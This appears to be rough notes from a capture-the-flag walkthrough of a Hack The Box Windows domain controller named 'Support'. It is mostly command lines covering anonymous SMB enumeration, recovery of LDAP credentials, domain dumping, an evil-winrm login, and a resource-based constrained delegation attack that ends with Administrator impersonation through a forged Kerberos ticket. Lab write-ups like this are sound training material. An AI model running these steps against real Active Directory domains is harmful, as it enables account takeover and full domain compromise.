Â
SMB 10.10.11.174 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
┌──(root㉿kali)-[~/Desktop/Support] └─# smbclient -L 10.10.11.174 -U "" Password for [WORKGROUP\]:
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share support-tools Disk support staff tools SYSVOL Disk Logon server share
┌──(root㉿kali)-[~/Desktop/Support] └─# smbclient -N //10.10.11.174/support-tools Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Jul 21 01:01:06 2022 .. D 0 Sat May 28 19:18:25 2022 7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 19:19:19 2022 npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 19:19:55 2022 putty.exe A 1273576 Sat May 28 19:20:06 2022 SysinternalsSuite.zip A 48102161 Sat May 28 19:19:31 2022 UserInfo.exe.zip A 277499 Thu Jul 21 01:01:07 2022 windirstat1_1_2_setup.exe A 79171 Sat May 28 19:20:17 2022 WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 19:19:43 2022
support\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
Â
ldapsearch -x -H ldap://10.10.10.161 -b "dc=support,dc=htb"
[LDAP] Attempting to parse an old simple Bind request. [LDAP] Cleartext Client : 192.168.77.131 [LDAP] Cleartext Username : support\ldap [LDAP] Cleartext Password : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz [Analyze mode: Browser] Datagram Request from IP: 192.168.77.1 hostname: DESKTOP-9GV6IKT via the: File Server to: WORKGROUP. Service: Local Master Browser
ldapdomaindump 'ldap://support.htb' -u 'support.htb\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
found password-like strings inside doamin_users.json, for username ‘support’
evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb
Â
use bloodhound
addcomputer.py -computer-name 'evil$' -computer-pass 'password' -dc-ip 10.129.227.255 'support.htb/support:Ironside47pleasure40Watchful'
rbcd.py -delegate-from 'evil$' -delegate-to 'dc$' -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'
getST.py -spn 'cifs/DC.support.htb' -impersonate 'Administrator' 'support.htb/evil$:password'
got the credential cache file Administrator.ccache
export KRB5CCNAME=pwd/Administrator.ccache
Â